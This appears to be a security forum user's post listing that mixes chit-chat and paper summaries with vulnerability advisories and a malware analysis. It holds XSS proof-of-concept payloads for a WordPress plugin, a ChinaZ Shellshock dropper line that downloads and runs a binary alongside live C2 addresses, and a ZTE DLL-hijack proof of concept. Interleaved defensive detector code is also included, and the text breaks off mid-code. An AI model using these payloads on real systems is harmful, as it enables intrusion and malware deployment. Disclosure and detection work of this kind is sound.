Aerosol

Active Members
  • Posts: 3453
  • Days Won: 22

Everything posted by Aerosol

  1. @Nytro have the like buttons disappeared? o.O They were still there 5 minutes ago...
  2. @hirosima if I had to choose based on what you said (between the two models), get a Lenovo P780. If you want my opinion, get a ZTE Tania (Windows Phone) and that's that. It runs extremely fast, doesn't freeze or give you other problems, 5 MP camera. I've had a ZTE (WP) for 2 years and never once had problems, it's very sturdy.
  3. Aerosol

     Forum problem?!?

     @AGSQ they get deleted all the time so that the forum runs better! By the way, stop tagging [tag]staff, there's no point.
  4. Ashampoo Photo Card allows you to easily turn photos and images into stunning, custom greeting cards — with just a few clicks. Want more features? Then get Ashampoo Photo Card 2 with free updates, the latest and greatest version of Ashampoo Photo Card! Sale ends in 1 day 13 hrs 02 mins Free Ashampoo Photo Card (100% discount)
  5. WinOrganizer is a full-scale personal information manager (PIM) that helps you organize and plan your business and personal life. It’s a planner, notepad, address book and more combined in one powerful application Free WinOrganizer (100% discount)
  6. Advisory ID: HTB23244
     Product: Simple Security WordPress Plugin
     Vendor: MyWebsiteAdvisor
     Vulnerable Version(s): 1.1.5 and probably prior
     Tested Version: 1.1.5
     Advisory Publication: December 17, 2014 [without technical details]
     Vendor Notification: December 17, 2014
     Public Disclosure: January 14, 2015
     Vulnerability Type: Cross-Site Scripting [CWE-79]
     CVE Reference: CVE-2014-9570
     Risk Level: Low
     CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
     Solution Status: Solution Available
     Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

     -----------------------------------------------------------------------------------------------

     Advisory Details:

     High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Simple Security WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of WP websites with the vulnerable plugin.

     1) Two Cross-Site Scripting (XSS) Vulnerabilities in Simple Security Wordpress Plugin: CVE-2014-9570

     The discovered vulnerabilities can be used by attackers to steal administrator's cookies of a vulnerable website. This can lead to total website compromise. Attackers can also perform drive-by-download attacks against website admin by injecting malware or exploit-packs into vulnerable scripts.

     1.1 User-supplied input passed via the "datefilter" HTTP GET parameter to "/wp-admin/users.php" script is not properly sanitised before being returned to the administrator. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in his browser in the context of the vulnerable website.

     The exploitation example below uses the "alert()" JavaScript function to display "ImmuniWeb" word:

     http://[host]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E

     1.2 User input passed via the "simple_security_ip_blacklist[]" HTTP POST parameter to "/wp-admin/users.php" script is not properly filtered before being returned to the administrator. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

     Below we provide a basic XSS exploit that uses JS "alert()" function to display "ImmuniWeb" pop-up:

     <form action="http://[host]/wp-admin/users.php?page=ip_blacklist" method="post" name="main">
     <input type="hidden" name="page" value="access_log">
     <input type="hidden" name="action" value="add_blacklist_ip">
     <input type="hidden" name="simple_security_ip_blacklist[]" value="'><script>alert('ImmuniWeb');</script>">
     <input type="submit" id="btn">
     </form>

     -----------------------------------------------------------------------------------------------

     Solution:

     Disclosure timeline:
     2014-12-17 Vendor Alerted via contact form.
     2014-01-02 Vendor Alerted via contact form and emails.
     2014-01-12 Fix Requested via contact form and emails.
     2014-01-14 Public disclosure with self-written patch.

     Currently we are not aware of any official solution for this vulnerability. Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23244-patch.zip

     -----------------------------------------------------------------------------------------------

     References:

     [1] High-Tech Bridge Advisory HTB23244 - https://www.htbridge.com/advisory/HTB23244 - Two XSS vulnerabilities in Simple Security WordPress plugin.
     [2] Simple Security Wordpress Plugin - http://mywebsiteadvisor.com/ - Simple Security Plugin for WordPress is a basic Access Log system that can monitor successful and failed login attempts and block IP addresses.
     [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
     [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
     [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

     -----------------------------------------------------------------------------------------------

     Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

     Source
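The two reflection points in the HTB23244 advisory above (a GET value echoed into an attribute, and a POST list of "IP addresses" echoed back to the admin) are a textbook case of missing output encoding plus missing input validation. The following is an added example written for this page, not code from the advisory or from the Simple Security plugin: the markup layout and function names are assumptions, and it shows the unescaped pattern next to a hardened rendering that HTML-encodes with quotes enabled (what WordPress's esc_attr() does) and validates blacklist entries as addresses or CIDR blocks before they are ever stored or echoed.

```python
"""Added example (not code from the HTB23244 advisory or the plugin): safe
handling of the two reflection points the advisory describes.  The markup
layout and function names are assumptions made for this example."""
import html
import ipaddress

# The advisory's payloads, URL-decoded (constructed test input for this example)
PAYLOAD_GET = "'\"><script>alert(/ImmuniWeb/);</script>"
PAYLOAD_POST = "'><script>alert('ImmuniWeb');</script>"


def render_datefilter_vulnerable(datefilter):
    """'Before' side: the GET value lands inside an attribute unescaped, so a
    quote character in the input closes the attribute and then the tag."""
    return '<input type="text" name="datefilter" value="' + datefilter + '">'


def render_datefilter(datefilter):
    """Hardened: HTML-encode with quote=True so ' and " are neutralised as
    well as < > & (the job WordPress's esc_attr() does in plugin code)."""
    return ('<input type="text" name="datefilter" value="'
            + html.escape(datefilter, quote=True) + '">')


def add_blacklist_ips(submitted):
    """Hardened handling for simple_security_ip_blacklist[]: the field is a
    list of IP addresses, so every entry is validated as an address or CIDR
    block before it is stored or echoed; anything else is rejected outright
    rather than encoded and kept."""
    accepted, rejected = [], []
    for raw in submitted:
        value = raw.strip()
        try:
            # strict=False lets a host address like 203.0.113.7 through as /32
            accepted.append(str(ipaddress.ip_network(value, strict=False)))
        except ValueError:
            rejected.append(value)
    return accepted, rejected


def render_blacklist(entries):
    """Output encoding is still applied to validated entries (defence in depth)."""
    return "<ul>" + "".join(
        "<li>" + html.escape(e, quote=True) + "</li>" for e in entries) + "</ul>"


def contains_script_tag(fragment):
    """Does the rendered fragment still contain a live <script tag?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    print(render_datefilter_vulnerable(PAYLOAD_GET))   # the tag survives intact
    print(render_datefilter(PAYLOAD_GET))              # everything is encoded
    print(add_blacklist_ips([PAYLOAD_POST, "203.0.113.7", "198.51.100.0/24"]))
```

The important design point is that the blacklist field gets a positive validator (it must parse as an IP or network) instead of a blacklist of dangerous characters; encoding on output is then a second, independent layer rather than the only one.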
  7. The ABCS of Death 2 (2014) Mischief Night 2014 (2014) I recommend them.
  8. What Is Process Hacker? Process Hacker is a free, open source, graphical tool for managing 32-bit and 64-bit Microsoft Windows processes, services, threads, memory, handles, modules, Security Access Tokens (SATs) and network connections. It is a wonderful tool for analyzing and combating malware, understanding low-level details of the Windows operating system, troubleshooting, and experimenting with Windows in ways which Microsoft never intended. Process Hacker is similar to the famous Sysinternals Process Explorer tool from Microsoft, but open source and a bit more fun (http://www.microsoft.com/sysinternals). Now that Process Explorer is the property of Microsoft Corporation, Process Explorer cannot be enhanced with features which might be used to circumvent security restrictions or otherwise embarrass Microsoft. There are also no legal hassles when redistributing Process Hacker or its source code (no Microsoft lawyers = good thing). Examining the source code of Process Hacker is an interesting way to learn more about Windows internals, and Process Hacker itself is an actively maintained project. Fortunately, if you prefer Process Explorer, almost all of this presentation applies to it as well. So please feel free to use Process Hacker or Process Explorer as you wish. Both tools are great. And if you have questions, don't forget about the discussion forums for Process Hacker (Process Hacker Forums - Index page) and Sysinternals Process Explorer (Sysinternals Forums). Read more: http://alexandreborgesbrazil.files.wordpress.com/2014/01/process_hacker_sans_jason_fossen.pdf
  9. ABSTRACT There are a lot of things around us that give us comfort, but we sometimes misuse them. In this topic we will cover how Bluetooth is hacked and causes security issues. The main objective of this presentation is Bluetooth hacking, its impact and prevention. Further, we will focus on how Bluetooth hacking is done, the different categories of Bluetooth hacks, the threats a business can face and their prevention. When we hear the term hacking, we usually think it is attached to computers only. Now not only your computers are hacked, but your Bluetooth can be hacked too. This is one of the big drawbacks of Bluetooth. There are different types of hacking such as Bluejacking, Bluesnarfing, Bluebugging, Bluetoothing, Blueprinting etc. The purpose of all this Bluetooth hacking is to hack your phone and your privacy. Bluetooth hacking takes place because of the security lacking in Bluetooth technology. If someone hacks your Bluetooth, the hacker can steal your contacts, personal files and pictures, restore factory settings, or use your phone for calling and using the internet. Besides this, they can access the international mobile equipment identity number (IMEI), which they can use for cloning your cell phone. When your cell phone is cloned, your messages can be sent to other numbers. It will impact the business world. Mobile, while providing great opportunity, also brings security risks. Companies need to protect their consumers in order to remain credible and reliable; for this, the selection of the appropriate security policies for all Bluetooth-capable devices will impact your business. This frequently includes handheld devices owned by employees. To avoid the fraudulent use of corporate data, we need to follow some protocols: Keep BT in the disabled state and the device in non-discoverable mode. Use non-regular patterns as PIN keys while pairing a device. Register your device at the manufacturer's site and ensure that security updates are installed regularly to protect from previously known threats which have been rectified in new models. Proper security testing will provide customer satisfaction as well as increase the company's business. Read more: http://www.larsentoubro.com/lntcorporate/common/ui_templates/pdf/Bluetooth%20hacking%20and%20its%20Prevention%202014.pdf
  10. D&D = Description & Detection
     C&C = Command & Control
     Why this talk?
     - to explain advanced communication channel used by modern malware;
     - to explain how to correctly detect and contain attacks (to be blind in your network is the worst situation);
     - to show strength of Suricata;
     - to show why incident response team should work with network team;
     - and …
     Read more: http://2014.hack.lu/archive/2014/hacklu-joker-presentation.pdf
  11. Part 1. Introduction
     Ponemon Institute is pleased to present the findings of The SQL Injection Threat Study sponsored by DB Networks. The purpose of this research is to understand how organizations respond to the SQL injection threat and their awareness about different approaches to managing this risk. The study surveyed 595 individuals who work in IT and IT security. The majority of respondents are familiar with core IDS technologies that detect rogue SQL statements on the network that connect the web application to the database. SQL injections have been defined as being used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injections exploit security vulnerabilities in an application's software. SQL injection is most commonly known as an attack vector through public facing websites but can be used to attack SQL databases in a variety of ways. The most salient findings are shown below:
     • The SQL threat is taken seriously because 65 percent of organizations represented in this study experienced a SQL injection attack that successfully evaded their perimeter defenses in the last 12 months.
     • Almost half of respondents (49 percent) say the SQL injection threat facing their company is very significant. On average, respondents believe 42 percent of all data breaches are due, at least in part, to SQL injections.
     • Many organizations are not familiar with the techniques used by cyber criminals. Less than half of respondents (46 percent) are familiar with the term Web Application Firewalls (WAF) bypass. Only 39 percent of respondents are very familiar or familiar with the techniques cyber criminals use to get around WAF perimeter security devices.
     • BYOD makes understanding the root causes of an SQL injection attack more difficult. Fifty-six percent of respondents say determining the root causes of SQL injection is becoming more difficult because of the trend for employees to use their personally owned mobile devices (BYOD) in the workplace. Another challenge, according to 41 percent of respondents, is increasing stealth and/or sophistication of cyber attackers.
     • Expertise and the right technologies are critical to preventing SQL injection attacks. While respondents see the SQL threat as serious, only 31 percent say their organization's IT security personnel possess the skills, knowledge and expertise to quickly detect a SQL injection attack and 34 percent agree that they have the technologies or tools to quickly detect a SQL injection attack.
     • Measures to prevent SQL injection attacks are also lacking. Despite concerns about the threat, 52 percent do not take such precautions as testing and validating third party software to ensure it is not vulnerable to SQL injection attack.
     • Organizations move to a behavioral analysis solution to combat the SQL injection threat. Eighty-eight percent of respondents view behavioral analysis either very favorably or favorably.
     Read more: http://www.dbnetworks.com/pdf/ponemon-the-SQL-injection-threat-study.pdf
  12. • 10 CFR 72.42(a), 72.240(c):
       - TLAAs that demonstrate that ITS SSCs will continue to perform their intended function for the period of extended operation.
       - A description of the AMP for management of issues associated with aging that could adversely affect ITS SSCs.
     • Guidance: NUREG-1927
     AMP Elements:
     1. Scope of the Program
     2. Preventive Actions
     3. Parameters Monitored/Inspected
     4. Detection of Aging Effects
     5. Monitoring and Trending
     6. Acceptance Criteria
     7. Corrective Actions
     8. Confirmation Process
     9. Administrative Controls
     10. Operating Experience
     Read more: http://pbadupws.nrc.gov/docs/ML1419/ML14192A702.pdf
  13. Anatomy of botnet
     Planning the protections against botnets, companies should take into consideration the principle known in the military world, described more than two thousand years ago by Sun Tzu in The Art of War: "If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." Understanding a botnet's anatomy is key to effective defense against it. A description of communication and main components of a botnet is presented in figure 2.
     Read more: http://www.clico.pl/services/practical-defense-in-depth-protection-against-botnets
  14. Contents
     Foreword
     Introduction: Malware Evolves in 2013
     Botnets Grow in Size and Stealth
       - 2013 ZeroAccess Trend: Damaged by sinkholing, but rebounded rapidly
       - ZeroAccess Detections by Country
       - Botnet Bitcoin Mining
     Android Malware: Mutating and Getting Smarter
       - Most Widespread Android Malware Detections, October 2013
       - Anatomy of a Hacked Mobile Device: How a hacker can profit from your smartphone
     Linux: Pivotal Technology, Attracting Criminals
     Mac OS X: A Year of Many Small Attacks
       - 4 Easy Ways to Protect Your Mac
     Web-Based Malware: More Sophisticated, Diverse and Hidden
       - Exploit Kits: Blackhole falls behind improved models
       - Zbot Spreading Across the Globe
       - Tips for Protecting Your Web Server and Clients
     Targeted Threats to Your Financial Accounts
     Windows: The Growing Risk of Unpatched Systems
     Spam Reinvents Itself
       - Spam Attachments, June 2013: Loading plenty of trouble
     SophosLabs: Staying Ahead of Today's Most Sophisticated Attacks
     Trends to Watch in 2014
     The Last Word
       - Sources
     Read more: http://www.sophos.com/en-us/threat-center/medialibrary/PDFs/other/sophos-security-threat-report-2014.pdf
  15. What This Talk is All About ?!
     • Learning about the different insights gathered from real-time testing of C&C panels
     • Understanding the facts and C&C design of botnet families
       - Zeus / ICE 1X / Citadel / BetaBot etc.
     • Busting several myths about C&C architecture and deployments
     • Learning what methods to follow when direct exploitation is not possible
     • Utilizing multiple vulnerabilities to attack C&C panels
     • Gathering information using weak C&C configurations
     • Building C&C intelligence for Incident Response and automated solutions
     Read more: http://www.secniche.org/blackhat-2014/blackhat_2014_briefings_presentation_exp_cc_flaws_adityaks.pdf
  16. 1. INTRODUCTION Nowadays, one of the main threats that Internet users face is botnets. Botnets are employed for many kinds of malicious activities; examples are DDoS, personal data theft, spam, bitcoin mining, and cyber-espionage [19][9]. In the last ten years, the main antivirus vendors have reported a constant growth of botnets in the wild [1][2]. Traditionally, botnets are centralised overlay networks where the Command-and-Control (C&C) servers act as a single point of control. Centralised botnets are easy to manage and maintain due to their centralised structure. A botmaster has a clear overview of the overlay network and she manages the bots, which, in turn, connect to the C&C servers to be reachable. Nevertheless, this architecture has an important drawback: the C&C servers are exposed and represent a single point of failure. Hence, by taking down the C&C servers, the whole botnet is defeated. In order to overcome this problem, botmasters have moved to more resilient unstructured P2P Read more: https://ccdcoe.org/cycon/2014/proceedings/d3r2s3_casenove.pdf
  17. This bot code was liberated from the Lizard Squad. Link packet storm Link: https://github.com/pop-pop-ret/lizkebab/
  18. The ELF's VT is: https://www.virustotal.com/en/file/92fd1971f7ac512d096821a4bf8553bc13d1c478680999dd2e15400fe8973793/analysis/
     Our initial draft report: https://pastebin.com/raw.php?i=gf4xrB9n

     This threat was detected just recently, via attacks via shellshock:

     /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh; chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo /tmp/China.Z-gxak\x80 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

     The above request was reported to be generated from the Windows version of the shellshock scanner binary, with the below trace:
     VT is: https://www.virustotal.com/en/file/ae677c48a6fdd79129bde3b5321bc4c3cd95c20e63302ad98afadeef64514d5f/analysis/ < noted: LOW detection..

     .rdata:0057D808 aBinBashCRmRfTm db '() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget %s -O /tmp/China'
     .rdata:0057D808 ; DATA XREF: StartAddress+124o
     .rdata:0057D808 db '.Z-%s >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chm'
     .rdata:0057D808 db 'od 777 /tmp/China.Z-%s >> /tmp/Run.sh;echo /tmp/China.Z-%s >> /tm'
     .rdata:0057D808 db 'p/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Ru'
     .rdata:0057D808 db 'n.sh;/tmp/Run.sh"',0

     The ELF payload was served from a hacked Windows system running the HFS server.

     The calls, subs & function names are obfuscated, yet some new unique typical characteristics can be spotted, like below, for detection purposes:

     Registration for autostart is done by modifying /etc/rc.local:
     sed -i -e '/exit/d' /etc/rc.local
     sed -i -e '2 i//ChinaZ' /etc/rc.local

     It hammered SE Linux, using hosts.conf - resolve.conf - and libnss as DNS resolver, and generated the backdoor as per below, noted: not necessarily using hostname basis.

     SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
     SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("202.238.95.24")}, [16])
     SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
     SYSCALL5D, write(3, "\0\0\0\0Linux2.6.2-4-686-\0\275w\267\0\1\0\0"..., 168) = 168

     In this particular sample it calls CNC in aa.gm352.com (121.12.173.173:9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H

     $ my_lookup aa.gm352.com
     aa.gm352.com. 300 IN A 121.12.173.173
     gm352.com. 3600 IN NS ns4.he.net.
     gm352.com. 3600 IN NS ns3.he.net.
     gm352.com. 3600 IN NS ns2.he.net.
     gm352.com. 3600 IN NS ns1.he.net.
     gm352.com. 3600 IN NS ns5.he.net.
     $ mycnccheck 121.12.173.173:9521
     Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
     IPv4 TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)

     Due to the unique new infection pair shellshock (scanner-payload), new functions & new signature used, we consider this a new China DDoSer variant: "ChinaZ"

     9521.7z Pass: infected
     Source
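The post above gives two host- and network-side artefacts a responder can match on: the Shellshock delivery string carrying the China.Z dropper in an HTTP header, and the two sed edits that plant a `//ChinaZ` line in /etc/rc.local. The following is an added example for this page, not code from the original post or its authors: a small detector that runs over constructed access-log lines and over constructed rc.local contents. The log lines are made up for the example (the indicator strings themselves come from the post, with the download host masked as xxxx as in the post).

```python
"""Added example (not from the original post): detection of the two ChinaZ
artefacts described above.  Log lines and rc.local samples are constructed."""

# Indicator strings quoted in the post
SHELLSHOCK_PREFIX = "() { :; };"                  # function-definition prefix in a header value
CHINAZ_MARKERS = ("China.Z", "/tmp/Run.sh", "ChinaZ")
RC_LOCAL_MARKER = "//ChinaZ"                      # inserted by: sed -i -e '2 i//ChinaZ' /etc/rc.local

# Constructed web-server access log (combined format, User-Agent last).  Line 2
# carries the delivery string from the post, with the download host masked.
SAMPLE_LOG = r'''
203.0.113.10 - - [10/Jan/2015:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Jan/2015:03:13:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://xxxx:81/9521 -O /tmp/China.Z-gxak >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
203.0.113.10 - - [10/Jan/2015:03:14:09 +0000] "GET /about.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''

# Constructed rc.local contents: a stock file, and the same file after the two
# sed commands from the post (the 'exit' line deleted, the marker inserted at line 2)
RC_LOCAL_CLEAN = "#!/bin/sh -e\n# rc.local\nexit 0\n"
RC_LOCAL_TAMPERED = "#!/bin/sh -e\n//ChinaZ\n# rc.local\n"


def classify_line(line):
    """Findings for one log line: 'shellshock' when a header value starts a
    bash function definition, plus 'chinaz-dropper' when the China.Z stager
    markers ride along in the same request."""
    findings = []
    if SHELLSHOCK_PREFIX in line:
        findings.append("shellshock")
        if any(marker in line for marker in CHINAZ_MARKERS):
            findings.append("chinaz-dropper")
    return findings


def scan_log(text):
    """Return (line number, source address, findings) for every suspicious line."""
    hits = []
    for lineno, line in enumerate(text.strip().splitlines(), 1):
        findings = classify_line(line)
        if findings:
            hits.append((lineno, line.split()[0], findings))
    return hits


def rc_local_tampered(rc_local_text):
    """True when rc.local shows the persistence edits from the post: the
    marker sits at line 2, or the marker is present and the 'exit' line is gone."""
    lines = [l.strip() for l in rc_local_text.splitlines()]
    exit_present = any(l.startswith("exit") for l in lines)
    marker_at_line2 = len(lines) >= 2 and lines[1] == RC_LOCAL_MARKER
    return marker_at_line2 or (RC_LOCAL_MARKER in lines and not exit_present)


if __name__ == "__main__":
    for lineno, src, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {src} -> {', '.join(findings)}")
    print("clean rc.local tampered:", rc_local_tampered(RC_LOCAL_CLEAN))
    print("edited rc.local tampered:", rc_local_tampered(RC_LOCAL_TAMPERED))
```

Matching on the `() { :; };` prefix catches any Shellshock probe regardless of payload; the China.Z markers only narrow the finding to this family. On a live host the rc.local check is cheap enough to run from a periodic integrity job, alongside watching for outbound connections to the C2 pair given in the post.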
  19. Multiple successors of the original Silk Road have come and all have been taken offline in recent years, but aside from selling illegal goods and services, they have all had one thing in common: they've all relied on the Tor network. A new version of the anonymous online black market Silk Road has re-appeared on the dark web, but this time the website doesn't rely on the now infamous Tor network, nor does it deal only in Bitcoins. The new version of the notorious online black market, dubbed "Silk Road Reloaded", launched Sunday on the little-known "I2P" anonymous network, dealing with a range of cryptocurrencies including the meme-inspired Dogecoin. In short, apart from the name, there is no connection between the original Silk Road website and the newly launched Silk Road Reloaded. Silk Road Reloaded is only accessible by downloading the special software called I2P (Invisible Internet Project), or by configuring your systems in such a way that they connect to I2P web pages with the .i2p suffix. Just like the Tor network, I2P also lets users browse websites and send messages anonymously. Another key difference between the original Silk Road and Silk Road Reloaded is the fact that the new site accepts more than just Bitcoins as a form of payment. Silk Road Reloaded deals in a total of eight different forms of cryptocurrency, including Darkcoin, Dogecoin, and Anoncoin, with more along the way. These are two of the biggest differentiators between the new Silk Road and its ancestors. Silk Road Reloaded has most of the illicit unmentionables you'd expect from an online black market, save for weapons and stolen credit card credentials, something which some Tor sites, such as Evolution, now sell in abundance, Motherboard reported. When Silk Road 2.0 was taken down in November last year, black markets struggled to find an alternative to set up their shop. Probably they switched to the I2P network because the Tor network had been compromised several times and targeted by the U.S. government. Silk Road Reloaded has seemingly found a possible answer. I2P websites require special software to access them and do not appear in Google searches, circumventing surveillance from Internet service providers (ISPs) and government agencies. Although it operates in a similar way to the Tor browser, I2P or "eepsites" are believed to offer increased security. The creator of the Silk Road Reloaded has been promoting it on the Silk Road section of Reddit, saying: "I've built a great platform and it speaks for itself." Source
  20. /*
     * Exploit Title: ZTE Datacard MF180 PCW_TNZNZLMF180V1.0.0B02 (Telecom MF180 Modem) Insecure Permissions Local Privilege Escalation & PoC Local crash & Path Subversion Arbitrary DLL Injection Code Execution (mms_dll_r.dll)
     * Date: 10/01/2015
     * Author: Hadji Samir s-dz@hotmail.fr
     * Link soft: http://www.zte.co.nz/downloads/software/MF180_PC_Install.exe
     * Vendor: http://www.zte.co.nz/main/Product_Downloads/MF180_downloads.htm http://www.zte.com.cn/
     * Tested on: windows 7 FR
     * Thanks Anna

     ############################# Insecure Permissions Local Privilege Escalation ################################################

     Technical Details & Description:
     ================================
     A local privilege escalation vulnerability has been discovered in the official ZTE Datacard mobiconnect application software. The local security vulnerability allows attackers to gain higher access privileges by execution of arbitrary code. The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can replace the executable file with a binary of choice. The vulnerability exists due to improper permissions, with the `F` flag (full) for the `Everyone` (Tout le monde:F) and `Users` groups, for all binary files. The files are installed in the `Ucell Internet` directory which has the Everyone group assigned to it with full permissions, making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges.

     Proof of Concept (PoC):
     =======================
     The vulnerability can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

     --- PoC Session Logs ---
     C:\Users\s-dz>cacls "C:\Program Files\Telecom Connection Manager"
     C:\Program Files\Telecom Connection Manager Tout le monde:F
     Tout le monde:(OI)(CI)(IO)F
     NT SERVICE\TrustedInstaller:(ID)F
     NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
     AUTORITE NT\Système:(ID)F
     AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
     BUILTIN\Administrateurs:(ID)F
     BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
     BUILTIN\Utilisateurs:(ID)R
     BUILTIN\Utilisateurs:(OI)(CI)(IO)(ID)(accès spécial GENERIC_READ GENERIC_EXECUTE
     CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
     C:\Users\s-dz>

     2- ########################### PoC Local crash ##########################################################
     First go to C:\program files\Internet Mobile\NetworkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName>. Save it, open the program. poc will crash ...........
     ##########################################################################################################

     3- ######################## Path Subversion Arbitrary DLL Injection Code Execution (mms_dll_r.dll) #######################
     ZTE modems are prone to a flaw in the way they load dynamic-link libraries (mms_dll_r.dll). The program uses a fixed path to look for specific files or libraries. This path includes directories that may not be trusted or under user control. By placing a custom version of the file or library in the path, the program will load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privilege of the program or user executing the program. This attack can be leveraged remotely in some cases by placing the malicious file or library on a network share or extracted archive downloaded from a remote source. This can be done by tricking a user into opening an unspecified file from the local file system or a USB drive in some cases.
     */

     #include <windows.h>

     /* Prototype added so DllMain can call owned() before its definition;
        behaviour of the PoC (a message box on load) is unchanged. */
     int owned(void);

     BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
     {
         switch (fdwReason)
         {
             case DLL_PROCESS_ATTACH:
                 owned();      /* runs when the host process loads the DLL */
                 /* fall through to break */
             case DLL_THREAD_ATTACH:
             case DLL_THREAD_DETACH:
             case DLL_PROCESS_DETACH:
                 break;
         }
         return TRUE;
     }

     int owned(void)
     {
         /* "\n" replaces the invalid "\H" escape of the original string */
         MessageBox(0, "ZTE DLL Hijacked\nHadji Samir", "POC", MB_OK);
         return 0;
     }

     Source
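The root cause in the first issue above is visible in the cacls listing: the `Tout le monde` (Everyone) entries carry `F`, so any local user can replace the binaries. The following is an added example for this page, not code from the advisory or from ZTE: a parser for cacls output that flags access-control entries granting write-class rights to principals every local user belongs to. The sample output is constructed from the listing in the post, with the line wrapping that cacls normally applies re-created (cacls prints the first ACE on the path line and continues a special-access entry on indented lines; the exact French wording of the special-access entry is an assumption). The principal names include the French and English forms, since the post's listing comes from a French Windows.

```python
"""Added example (not from the advisory or the vendor): flag cacls ACEs that
give write-class access to low-privilege principals.  The sample is
constructed from the listing in the post above."""
import re

# Principals that any local user belongs to (English and French names)
LOW_PRIV_PRINCIPALS = {
    "everyone", "tout le monde",
    "builtin\\users", "builtin\\utilisateurs",
    "nt authority\\authenticated users", "autorite nt\\utilisateurs authentifiés",
}
WRITE_RIGHTS = {"F", "C", "W"}        # cacls shorthand: Full, Change, Write
WRITE_SPECIAL = {"GENERIC_ALL", "GENERIC_WRITE", "FILE_WRITE_DATA",
                 "FILE_APPEND_DATA", "DELETE", "WRITE_DAC", "WRITE_OWNER"}

# principal:(flag)(flag)RIGHT   or   principal:(flags)(special access :)
ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[FCWRN]|\(.*\))$")

# Constructed sample, built from the post's listing (French Windows 7)
SAMPLE_PATH = r"C:\Program Files\Telecom Connection Manager"
SAMPLE_CACLS = r"""
C:\Program Files\Telecom Connection Manager Tout le monde:F
                                            Tout le monde:(OI)(CI)(IO)F
                                            NT SERVICE\TrustedInstaller:(ID)F
                                            NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                                            AUTORITE NT\Système:(ID)F
                                            AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
                                            BUILTIN\Administrateurs:(ID)F
                                            BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
                                            BUILTIN\Utilisateurs:(ID)R
                                            BUILTIN\Utilisateurs:(OI)(CI)(IO)(ID)(accès spécial :)
                                                                                 GENERIC_READ
                                                                                 GENERIC_EXECUTE
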